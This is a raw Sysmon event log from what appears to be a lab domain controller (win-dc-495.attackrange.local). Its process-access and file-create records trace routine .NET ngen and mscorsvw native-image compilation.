13:47:36.562{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9178-6005-9602-00000000A301}4552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.546{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9178-6005-9602-00000000A301}4552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.546{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9178-6005-9602-00000000A301}4552C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.530{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9178-6005-9502-00000000A301}4528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.515{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9178-6005-9502-00000000A301}4528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:36.515{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9178-6005-9502-00000000A301}4528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:36.421{59A5CD1D-9177-6005-9402-00000000A301}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\f80-0\System.Printing.dll2021-01-18 13:47:36.421 10341000x80000000000000006806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.905{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9179-6005-9E02-00000000A301}4200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.890{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9179-6005-9E02-00000000A301}4200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.890{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9179-6005-9E02-00000000A301}4200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.859{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9179-6005-9D02-00000000A301}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.827{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9179-6005-9D02-00000000A301}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.827{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9179-6005-9D02-00000000A301}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:37.765{59A5CD1D-9179-6005-9C02-00000000A301}4740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1284-0\System.Runtime.Serialization.Formatters.Soap.dll2021-01-18 13:47:37.765 10341000x80000000000000006799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.546{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9179-6005-9C02-00000000A301}4740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.546{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9179-6005-9C02-00000000A301}4740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.546{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9179-6005-9C02-00000000A301}4740C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9179-6005-9B02-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.499{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9179-6005-9B02-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.499{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9179-6005-9B02-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:37.437{59A5CD1D-9179-6005-9A02-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12f4-0\System.Runtime.DurableInstancing.dll2021-01-18 13:47:37.437 10341000x80000000000000006792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.140{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9179-6005-9A02-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.140{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9179-6005-9A02-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.140{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9179-6005-9A02-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.077{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9179-6005-9902-00000000A301}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.062{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9179-6005-9902-00000000A301}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:37.062{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9179-6005-9902-00000000A301}3052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:36.999{59A5CD1D-9178-6005-9802-00000000A301}4848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12f0-0\System.Runtime.Caching.dll2021-01-18 13:47:36.999 10341000x80000000000000006813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 